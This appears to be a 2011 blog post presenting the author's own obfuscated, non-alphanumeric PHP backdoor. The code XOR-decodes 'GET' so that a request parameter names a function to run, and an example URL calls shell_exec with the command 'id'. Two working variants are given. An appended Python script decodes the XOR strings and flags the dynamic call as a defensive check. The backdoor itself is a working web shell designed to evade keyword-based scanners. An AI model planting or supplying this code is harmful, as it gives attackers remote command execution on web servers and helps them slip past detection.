2011
09.24
After reading and learning about non-alphanumeric code in PHP, I decided to write my own simple non-alphanumeric PHP backdoor.
<?
$_="{"; #XOR char
$_=($_^"<").($_^">").($_^"/"); #XOR = GET
?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
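Well, it's quite a simple program: it's just XOR over strings. XOR-ing each character of "<>/" with "{" gives the string "GET" as the result.
Put the result into the one-liner code execution and done: ${'_'.$_} resolves to $_GET, so the function named in the "_" parameter is called with the "__" parameter as its argument.
Another version, which wraps the output in a "<pre>" tag.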
<?
$_="{"; #XOR char
$__=($_^"+").($_^")").($_^">"); #XOR = PRE
$_=($_^"<").($_^">").($_^"/"); #XOR = GET
?>
<?="<".$__.">".${'_'.$_}["_"](${'_'.$_}["__"]);?>
Execution:
blabla.php?_=shell_exec&__=id
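A defender-side check for the two snippets above, as an added example that is not code from the original post: it replays the single-character XOR assignments to recover the hidden string and flags the variable-function call. The names `decode_xor_strings` and `scan` and the regexes are assumptions made for this sketch, and only the single-byte XOR form shown here is handled.

```python
import re

# Sample input: the first snippet from the post, embedded so this runs offline.
SAMPLE = r'''<?
$_="{"; #XOR char
$_=($_^"<").($_^">").($_^"/"); #XOR = GET
?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>'''

STMT = re.compile(r'(\$\w+)\s*=\s*([^;]+);')                    # $var = <rhs>;
TERM = re.compile(r'\(\s*(\$\w+)\s*\^\s*"([^"\\])"\s*\)')       # ($key ^ "c")
DYN_CALL = re.compile(r'\$\{[^}]*\}\s*\[[^\]]*\]\s*\(')         # ${expr}[key](
SUPERGLOBALS = {"GET", "POST", "REQUEST", "COOKIE", "SERVER", "FILES"}


def decode_xor_strings(src):
    """Replay assignments in source order and return {variable: decoded string}."""
    env = {}
    for name, rhs in STMT.findall(src):
        literal = re.fullmatch(r'\s*"([^"\\]*)"\s*', rhs)
        if literal:                                   # plain string, e.g. the XOR key
            env[name] = literal.group(1)
            continue
        terms = TERM.findall(rhs)
        only_terms = TERM.sub("", rhs).strip(". \t") == ""
        # Only single-byte keys are handled, which is the form used in the post.
        if terms and only_terms and all(len(env.get(k, "")) == 1 for k, _ in terms):
            env[name] = "".join(chr(ord(env[k]) ^ ord(c)) for k, c in terms)
    return env


def scan(src):
    """Report superglobal names hidden behind XOR and variable-function calls."""
    decoded = decode_xor_strings(src)
    hidden = sorted("$_" + v for v in decoded.values() if v.upper() in SUPERGLOBALS)
    return {
        "decoded": decoded,
        "hidden_superglobals": hidden,
        "dynamic_call": bool(DYN_CALL.search(src)),
    }


if __name__ == "__main__":
    print(scan(SAMPLE))
```

A file that reports both a hidden superglobal and a dynamic call is worth manual review; keyword-based scanners that grep for `$_GET` or `eval` will not match either snippet.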